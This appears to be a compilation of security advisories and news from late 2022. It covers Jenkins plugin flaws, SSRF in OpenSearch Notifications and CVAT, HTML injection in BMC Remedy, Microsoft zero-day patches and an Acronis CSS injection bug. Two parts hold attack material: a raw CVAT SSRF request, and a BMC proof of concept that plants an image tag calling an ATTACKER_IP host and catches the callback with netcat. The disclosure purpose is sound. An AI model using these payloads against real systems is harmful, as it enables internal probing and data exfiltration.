Jenkins Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query parameter in an HTTP endpoint, allowing unauthenticated attackers to read arbitrary files with '.xml' extension on the Jenkins controller file system.

CVE-2022-45388: Jenkins Security Advisory 2022-11-15

A missing permission check in Jenkins loader.io Plugin 1.0.1 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins.

CVE-2022-45390: Jenkins Security Advisory 2022-11-15

Jenkins JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent XML external entity (XXE) attacks.

CVE-2022-45400: Jenkins Security Advisory 2022-11-15

Jenkins Associated Files Plugin 0.2.1 and earlier does not escape names of associated files, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers with Item/Configure permission.

CVE-2022-45401: Jenkins Security Advisory 2022-11-15

Jenkins NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier globally and unconditionally disables SSL/TLS certificate and hostname validation for the entire Jenkins controller JVM.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Tue, 15 Nov 2022 18:40:52 +0100
From: Daniel Beck <ml@...kweb.net>
To: oss-security@...ts.openwall.com
Subject: Multiple vulnerabilities in Jenkins plugins

Jenkins is an open source automation server which enables developers around
the world to reliably build, test, and deploy their software.

The following releases contain fixes for security vulnerabilities:

\* CloudBees Docker Hub/Registry Notification Plugin 2.6.2.1
\* JUnit Plugin 1160.vf1f01a\_a\_ea\_b\_7f
\* Naginator Plugin 1.18.2
\* NS-ND Integration Performance Publisher Plugin 4.8.0.146
\* Pipeline Utility Steps Plugin 2.13.1 and 2.13.2
\* Reverse Proxy Auth Plugin 1.7.4
\* Script Security Plugin 1190.v65867a\_a\_47126
\* Support Core Plugin 1206.1208.v9b\_7a\_1d48db\_0f

Additionally, we announce unresolved security issues in the following
plugins:

\* Associated Files Plugin
\* BART Plugin
\* CCCC Plugin
\* Cluster Statistics Plugin
\* Config Rotator Plugin
\* Delete log Plugin
\* JAPEX Plugin
\* loader.io Plugin
\* NS-ND Integration Performance Publisher Plugin
\* OSF Builder Suite :: XML Linter Plugin
\* SourceMonitor Plugin
\* Violations Plugin
\* XP-Dev Plugin

Summaries of the vulnerabilities are below. More details, severity, and
attribution can be found here:
https://www.jenkins.io/security/advisory/2022-11-15/

We provide advance notification for security updates on this mailing list:
https://groups.google.com/d/forum/jenkinsci-advisories

If you discover security vulnerabilities in Jenkins, please report them as
described here:
https://www.jenkins.io/security/#reporting-vulnerabilities

---

SECURITY-2564 / CVE-2022-45379
Script Security Plugin 1189.vb\_a\_b\_7c8fd5fde and earlier stores
whole-script approvals as the SHA-1 hash of the approved script. SHA-1 no
longer meets the security standards for producing a cryptographically
secure message digest.


SECURITY-2888 / CVE-2022-45380
JUnit Plugin 1159.v0b\_396e1e07dd and earlier converts HTTP(S) URLs in test
report output to clickable links.

This is done in an unsafe manner, resulting in a stored cross-site
scripting (XSS) vulnerability exploitable by attackers with Item/Configure
permission.


SECURITY-2948 / CVE-2022-33980
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.0 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library with
the vulnerability CVE-2022-33980.

This vulnerability allows attackers able to configure Pipelines to execute
arbitrary code in the context of the Jenkins controller JVM.


SECURITY-2949 / CVE-2022-45381
Pipeline Utility Steps Plugin implements a \`readProperties\` Pipeline step
that supports interpolation of variables using the Apache Commons
Configuration library.

Pipeline Utility Steps Plugin 2.13.1 and earlier does not restrict the set
of enabled prefix interpolators and bundles versions of this library that
enable the \`file:\` prefix interpolator by default.

This allows attackers able to configure Pipelines to read arbitrary files
from the Jenkins controller file system.


SECURITY-2946 / CVE-2022-45382
Naginator Plugin 1.18.1 and earlier does not escape display names of source
builds in builds that were triggered via Retry action.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers able to edit build display names.


SECURITY-2804 / CVE-2022-45383
Support Core Plugin defines the permission Support/DownloadBundle that
allows users without Overall/Administer permission to create and download
support bundles containing a limited set of diagnostic information.

Support Core Plugin 1206.v14049fa\_b\_d860 and earlier does not correctly
perform permission checks in several HTTP endpoints.

This allows attackers with Support/DownloadBundle permission to download a
previously created support bundle containing information limited to users
with Overall/Administer permission.


SECURITY-2094 / CVE-2022-45384
Reverse Proxy Auth Plugin 1.7.3 and earlier stores the LDAP manager
password unencrypted in the global \`config.xml\` file on the Jenkins
controller as part of its configuration.

This password can be viewed by attackers with access to the Jenkins
controller file system.


SECURITY-2843 / CVE-2022-45385
CloudBees Docker Hub/Registry Notification Plugin provides several webhook
endpoints that can be used to trigger builds when Docker images used by a
job have been rebuilt.

In CloudBees Docker Hub/Registry Notification Plugin 2.6.2 and earlier,
these endpoints can be accessed without authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to the attacker-specified repository.


SECURITY-766 / CVE-2022-45386
Violations Plugin 0.7.11 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers to to control XML input files for the 'Report
Violations' post-build step to have agent processes parse a crafted file
that uses external entities for extraction of secrets from the Jenkins
agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2802 / CVE-2022-45387
BART Plugin 1.0.3 and earlier does not escape the parsed content of build
logs before rendering it on the Jenkins UI.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.


SECURITY-2842 / CVE-2022-45388
Config Rotator Plugin 2.0.1 and earlier does not restrict a file name query
parameter in an HTTP endpoint.

This allows unauthenticated attackers to read arbitrary files with \`.xml\`
extension on the Jenkins controller file system.

As of publication of this advisory, there is no fix.


SECURITY-2853 / CVE-2022-45389
XP-Dev Plugin provides a webhook endpoint at \`/xpdev-webhook\` that can be
used to trigger builds configured to use a specified repository.

In XP-Dev Plugin 1.0 and earlier, this endpoint can be accessed without
authentication.

This allows unauthenticated attackers to trigger builds of jobs
corresponding to an attacker-specified repository.

As of publication of this advisory, there is no fix.


SECURITY-2857 / CVE-2022-45390
loader.io Plugin 1.0.1 and earlier does not perform a permission check in
an HTTP endpoint.

This allows attackers with Overall/Read permission to enumerate credentials
IDs of credentials stored in Jenkins. Those can be used as part of an
attack to capture the credentials using another vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2910 (1) / CVE-2022-45391
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier
globally and unconditionally disables SSL/TLS certificate and hostname
validation for the entire Jenkins controller JVM.


SECURITY-2910 (2) / CVE-2022-38666
NS-ND Integration Performance Publisher Plugin 4.8.0.146 and earlier
unconditionally disables SSL/TLS certificate and hostname validation for
several features.

As of publication of this advisory, there is no fix.


SECURITY-2912 / CVE-2022-45392
NS-ND Integration Performance Publisher Plugin 4.8.0.143 and earlier stores
passwords unencrypted in job \`config.xml\` files on the Jenkins controller
as part of its configuration.

These passwords can be viewed by attackers with Item/Extended Read
permission or access to the Jenkins controller file system.


SECURITY-2920 / CVE-2022-45393 (CSRF) & CVE-2022-45394 (missing permission check)
Delete log Plugin 1.0 and earlier does not perform a permission check in an
HTTP endpoint.

This allows attackers with Item/Read permission to delete build logs.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2921 / CVE-2022-45395
CCCC Plugin 0.6 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control the contents of the report file for
the 'Publish CCCC Report' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2927 / CVE-2022-45396
SourceMonitor Plugin 0.2 and earlier does not configure its XML parser to
prevent XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Publish
SourceMonitor results' post-build step to have agent processes parse a
crafted file that uses external entities for extraction of secrets from the
Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2937 / CVE-2022-45397
OSF Builder Suite :: XML Linter 1.0.2 and earlier does not configure its
XML parser to prevent XML external entity (XXE) attacks.

This allows attackers able to control XML files that get processed by the
'OSF Builder Suite :: XML Linter' build step to have agent processes parse
a crafted file that uses external entities for extraction of secrets from
the Jenkins agent or server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2938 / CVE-2022-45398 (CSRF) & CVE-2022-45399 (missing permission check)
Cluster Statistics Plugin 0.4.6 and earlier does not perform a permission
check in an HTTP endpoint.

This allows attackers with Overall/Read permission to delete recorded
Jenkins Cluster Statistics.

Additionally, this HTTP endpoint does not require POST requests, resulting
in a cross-site request forgery (CSRF) vulnerability.

As of publication of this advisory, there is no fix.


SECURITY-2941 / CVE-2022-45400
JAPEX Plugin 1.7 and earlier does not configure its XML parser to prevent
XML external entity (XXE) attacks.

This allows attackers able to control XML input files for the 'Record Japex
test report' post-build step to have Jenkins parse a crafted file that uses
external entities for extraction of secrets from the Jenkins controller or
server-side request forgery.

As of publication of this advisory, there is no fix.


SECURITY-2947 / CVE-2022-45401
Associated Files Plugin 0.2.1 and earlier does not escape names of
associated files.

This results in a stored cross-site scripting (XSS) vulnerability
exploitable by attackers with Item/Configure permission.

As of publication of this advisory, there is no fix.

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-45391: security - Multiple vulnerabilities in Jenkins plugins

OpenSearch Notifications is a notifications plugin for OpenSearch that enables other plugins to send notifications via Email, Slack, Amazon Chime, Custom web-hook etc channels. A potential SSRF issue in OpenSearch Notifications Plugin 2.2.0 and below could allow an existing privileged user to enumerate listening services or interact with configured resources via HTTP requests exceeding the Notification plugin's intended scope. OpenSearch 2.2.1+ contains the fix for this issue. There are currently no recommended workarounds.

Signed-off-by: Mohammad Qureshi 47198598+qreshi@users.noreply.github.com

**Description**

Disabling redirect handling for the HttpClient used when sending Notifications.

**Issues Resolved**

\[List any issues this PR will resolve\]

**Check List**

*   Commits are signed per the DCO using --signoff

By submitting this pull request, I confirm that my contribution is made under the terms of the Apache 2.0 license.  
For more information on following Developer Certificate of Origin and signing off your commits, please check here.

CVE-2022-41906: Disable following redirects for webhooks by qreshi · Pull Request #507 · opensearch-project/notifications

CVAT version 2.0 suffers from a server-side request forgery vulnerability.

    #Exploit Title: CVAT 2.0 - SSRF (Server Side Request Forgery)#Exploit Author: Emir Polat#Vendor Homepage: https://github.com/opencv/cvat#Version: < 2.0.0#Tested On: Version 1.7.0 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)#CVE: CVE-2022-31188# Description:#CVAT is an opensource interactive video and image annotation tool for computer vision. Versions prior to 2.0.0 were found to be subject to a Server-side request forgery (SSRF) vulnerability. #Validation has been added to urls used in the affected code path in version 2.0.0. Users are advised to upgrade.POST /api/v1/tasks/2/data HTTP/1.1Host: localhost:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0Accept: application/json, text/plain, */*Accept-Language:en-US,en;q=0.5Accept-Encoding: gzip, deflateAuthorization: Token 06d88f739a10c7533991d8010761df721b790b7X-CSRFTOKEN:65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGVContent-Type: multipart/form-data; boundary=-----------------------------251652214142138553464236533436Content-Length: 569Origin: http://localhost:8080Connection: closeReferer:http://localhost:8080/tasks/createCookie: csrftoken=65s9UwX36e9v8FyiJi0KEzgMigJ5pusEK7dU4KSqgCajSBAYQxKDYCOEVBUhnIGv; sessionid=dzks19fhlfan8fgq0j8j5toyrh49dnedSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="remote files[0]"http://localhost:8081-----------------------------251652214142138553464236533436Content-Disposition: form-data; name=" image quality"170-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use zip chunks"true-----------------------------251652214142138553464236533436Content-Disposition: form-data; name="use cache"true-----------------------------251652214142138553464236533436--

CVAT 2.0 Server-Side Request Forgery

An issue was discovered in BMC Remedy before 22.1. Email-based Incident Forwarding allows remote authenticated users to inject HTML (such as an SSRF payload) into the Activity Log by placing it in the To: field. This affects rendering that occurs upon a click in the "number of recipients" field. NOTE: the vendor's position is that "no real impact is demonstrated."

The application BMC Remedy allows users to forward incidents via mail from the web interface. It is possible to inject HTML into the "To" field of the mail editor. Afterwards the application shows in the activity log that the incident was forwarded to <X> recipients. By clicking on the number of recipients the injected HTML is loaded and executed.

**Vendor description**

_"Remedy IT Service Management Suite (Remedy ITSM Suite) and BMC Helix ITSM service provide out of-the-box IT Information Library (ITIL) service support functionality. Remedy ITSM Suite and BMC Helix ITSM service streamline and automate the processes around IT service desk, asset management, and change management operations. It also enables you to link your business services to your IT infrastructure to help you manage the impact of technology changes on business and business changes on technology — in real time and into the future. In addition, you can understand and optimize the user experience, balance current and future infrastructure investments, and view potential impact on the business by using a real-time service model."_

Source: https://docs.bmc.com/docs/itsm91/home-608490971.html

**Business recommendation**

The vendor provides an updated version which should be installed immediately.

The vendor states that:

1.  We have done hardening in version 22.1.
2.  However, we do not agree with assigning the CVE to this vulnerability.
3.  As mentioned previously this is an informative vulnerability, and no real impact is demonstrated.

Nevertheless, this can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Vulnerability overview/description****1) HTML Injection (CVE-2022-26088)**

An authenticated attacker who can forward incidents per email is able to inject a limited set of HTML tags. This is accomplished by inserting arbitrary content into the "To:" field of the email. There is a filtering mechanism that prevents the injection of many HTML tags, for example <script>, and it also removes event handlers. An attacker is able to insert an image tag with an arbitrary src URL.

After sending the email, an entry is appended into the activity log of the incident which states that $USER has sent an email to <X> recipients. Upon clicking on the number <X>, the injected HTML code is loaded and executed.

By inserting an <img> with an arbitrary "src" attribute, an attacker can force the user's browser to make requests to his specified URL. This can be used to trigger actions on internal services via CSRF or exfiltrate information.

**Proof of concept****1) HTML Injection (CVE-2022-26088)**

When an incident is viewed, there is a button which allows forwarding the incident by mail. After entering a TO address and the body of the email, it can be sent by clicking on the send button.

The HTML injection can be performed by intercepting this request and changing the 'Email.To.InternetEmail' parameter. The modified request is:

    PUT /rest/incident/worknote/SOME_INCIDENT_ID HTTP/1.1
    Host: TARGET
    Cookie: […]
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
    Accept: application/json, text/plain, */*
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Content-Type: application/json;charset=utf-8
    X-Xsrf-Token: SOME_TOKEN
    Content-Length: ADAPT_AS_NEEDED
    Te: trailers
    Connection: close
    
    {
      "worknote": "pentest",
      "access": true,
      "Email.From.Person": {
        "email": "SOME_SENDING_MAIL",
        "fullName": "Pentest - SEC Consult",
        "loginId": "USERNAME"
      },
      "Email.Subject": "SOME_SUBJECT",
      "Email.Body": "test2",
      "Email.To.InternetEmail": "<img src=http: //ATTACKER_IP:8001/>a@example.test",
      "workInfoType": 16000
    }

The parameter Email.To.InternetEmail contains the payload. In this case an image tag containing the IP of the attacker was inserted:

    "<img src=http: //LOCAL_IP:8001/>a@example.test"

The a@example.test is needed to pass the email validation step and example.test was used to prevent sending out real emails. After this step, the information that $USER has sent an email to 1 recipient will be appended in the activity log of this incident.

Now we start a local netcat listener with the command:

    $ nc -vnlp 8001

Now we click on the number '1' in the activity log and see that the browser issues a request to our 'netcat' instance. This confirms that the browser tries to load the image from the specified URL.

**Vulnerable / tested versions**

The following version has been tested:

*   9.1.10 this corresponds to version 20.02 as stated at the following URL https://community.bmc.com/s/news/aA33n000000CmmSCAS/remedy-version-mapping 

**Vendor contact timeline**

**Solution**

Upgrade to version 22.1 or later which can be downloaded at the vendor's page:

https://www.bmc.com/support/resources/product-downloads.html

**Workaround**

None

**Advisory URL**

https://sec-consult.com/vulnerability-lab/

EOF Daniel Hirschberger / @2022

_Interested to work with the experts of SEC Consult? Send us your application_

_Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices_

CVE-2022-26088: HTML Injection in BMC Remedy ITSM-Suite

By Deeba Ahmed
Microsoft has urged Windows Administrators to install the updates urgently so make sure you have the latest patches installed!
This is a post from HackRead.com Read the original post: Microsoft Issues Patches to Fix 6 Active 0-Day Windows Vulnerabilities

It is no surprise that Microsoft’s products are on the hit list of cyber attacks, given the steadily increasing number of **zero-day attacks against them**. It is the second time in two months that the reputed software maker has released patches to fix already exploited zero-days in its scheduled Patch Tuesday update. The company urged Windows Administrators to install the updates urgently.

 The details of these flaws and the subsequent fixes are as follows:

**Microsoft Fixes Crucial Flaws in Patch Tuesday Update**

According to the tech giant, in its monthly security update, Patch Tuesday, the company has released patches for 68 vulnerabilities, including six unique, actively exploited zero-days. These flaws were flagged in the Exploitation Category. This includes two fixes for **Exchange Server security flaws** that a state-sponsored entity exploited for several months.

Twelve flaws were marked Critical, two of which were rated High, whereas fifty-five were rated Important in severity. The company also released patches for weaknesses fixed the previous week by **OpenSSL**.

Microsoft separately fixed another actively exploited vulnerability, **CVE-2022-3723**. It was detected in Chromium-based browsers.

**Zero-Days Details**

Microsoft’s security response team described four new and already exploited zero-days tracked as **CVE-2022-41125**, **CVE-2022-41073**, **CVE-2022-41091**, and **CVE-2022-41128**.

The CVE-2022-41128 was detected by Google TAG’s Benoît Sevens and Clément Lecigne, found in the Jscript9 component. It occurred when the target was lured to visit a malicious website.

The CVE-2022-41091 is a security bypass flaw in Windows MoTW (Mark of the Web), which was recently discovered to be weaponized by the **Magniber ransomware** actor, and users were targeted with fake software updates. A malicious file could help the attacker evade MoTW defenses that lead to loss of integrity and security features like MS Office’s Protected View, **Microsoft’s advisory read**.

**Microsoft Exchange Server Vulnerabilities**

In addition, they also patched two Microsoft Exchange server flaws tracked as **CVE-2022-41040 and CVE-2022-41082**. These exploits were used for privilege escalation, RCE (remote code execution), and feature bypassing.

The first four flaws impacted the Windows CNG Key Isolation Service, the Windows Print Spooler, Windows Mark of the Web Security, and Windows Scripting Languages. The other two flaws that **affected Exchange Server** entailed an RCE, and a privilege escalation bug, which was actually part of an extended exploit chain that Microsoft believes was exploited by a state-sponsored threat actor.

According to Microsoft, due to security issues, at least ten organizations have been targeted. Both flaws are documented as SSRF (server-side request forgery) issues.

**Critical Vulnerabilities Fixed in November**

Other Critical-rated vulnerabilities were privilege escalation flaws discovered in Windows Kerberos RC4-HMAC (**CVE-2022-37966**), Kerberos (**CVE-2022-37967**), and Microsoft Exchange Server (**CVE-2022-41080**). Moreover, a denial-of-service flaw was also fixed that impacted Windows Hyper-V (**CVE-2022-38015**).

1.  **Chinese Hackers Hiding Malware in Windows Logo**
2.  **Hackers Abusing Microsoft Dynamics 365 Customer Voice**
3.  **Microsoft Office Most Exploited Software in Malware Attacks**
4.  **Apple Safari Safest, Google Chrome Riskiest Browser of 2022**
5.  **Scammers Leveraging Microsoft Team GIFs in Phishing Attacks**

Microsoft Issues Patches to Fix 6 Active 0-Day Windows Vulnerabilities

CSRF attacks could be triggered to access and exfiltrate information

CSRF attacks could be triggered to access and exfiltrate information

A security researcher has disclosed a CSS injection flaw in Acronis software which could be abused for data theft.

On November 4, ‘Medi’ (under the alias ‘mr-medi’), published a technical analysis of the vulnerability, a client-side path traversal attack they described as the “favorite bug” they’ve ever found.

The vulnerability existed in the Acronis cloud management console. The software manages Acronis services, including cloud backups and resource monitoring.

**Path traversal**

According to the researcher, a web-facing URL would automatically pull a parameter called . Then, when the request is underway, a CSS file is also requested and loaded.

However, when this CSS file is asked for, the front-end code doesn’t sanitize the values, so it is possible for an attacker to perform a path traversal by requesting the same file from a different path.

This relative path overwrite isn’t intrinsically an important bug unless you combine it with an open redirect, which allows attackers to issue a request and force a redirect to an external domain where a malicious CSS file is stored.

Catch up on the latest web security research

Medi discovered a vulnerable API endpoint and Location HTTP header combination in which the user can control the parameter. This allowed the researcher to create an exploit with the color\_scheme parameter and a redirect, pointing to the domain so user information could be exfiltrated “by using CSS properties”.

Information could include cross-site request forgery (CSRF) tokens, personal data, partner hashes, and other data located in the Document Object Model (DOM) where the crafted CSS file is injected.

“If we specify our CSS file in a domain hosted by us, we can perform the CSRF attack via requests by loading an external image using CSS properties like , or exfiltrate user information like \[an\] IP, Referer header or User Agent,” the researcher explained. “I used my local server but you can check it out in any external domain you own.”

**Chain reaction**

A video-based Proof-of-Concept (PoC) attack has been published. Medi has also suggested that this technique could be chained with relative path overwrites and path-relative stylesheet import (PRSSI) vulnerabilities.

Medi told The Daily Swig: “Since this is an attack relying on the client side, the main risk is \[being able to\] exfiltrate information found in the vulnerable page and CSRF attacks. The type of bug depends on how the JavaScript handles the user input and the purpose of that parameter.

“For example, in Acronis, the vulnerable page was the admin dashboard containing valuable information about their customers \[and\] the parameter was used to dynamically apply styles \[...\] Other scenarios may involve leading to XSS with more serious issues like CSRF with any HTTP method.”

Medi’s findings were disclosed privately via the HackerOne platform and the flaw was patched on January 13. A $250 bug bounty was awarded.

Medi confirmed the bug had been resolved. On HackerOne, the Acronis team likened the security flaw to a reflected cross-site scripting (XSS) attack, which, despite the possibility of user data exfiltration when the color\_scheme is in use, accounts for the relatively low bug bounty.

The Daily Swig has reached out to Acronis for further comment and we will update this story as and when we hear back.

YOU MAY ALSO LIKE Gatsby patches SSRF, XSS bugs in Cloud Image CDN

Tag

#ssrf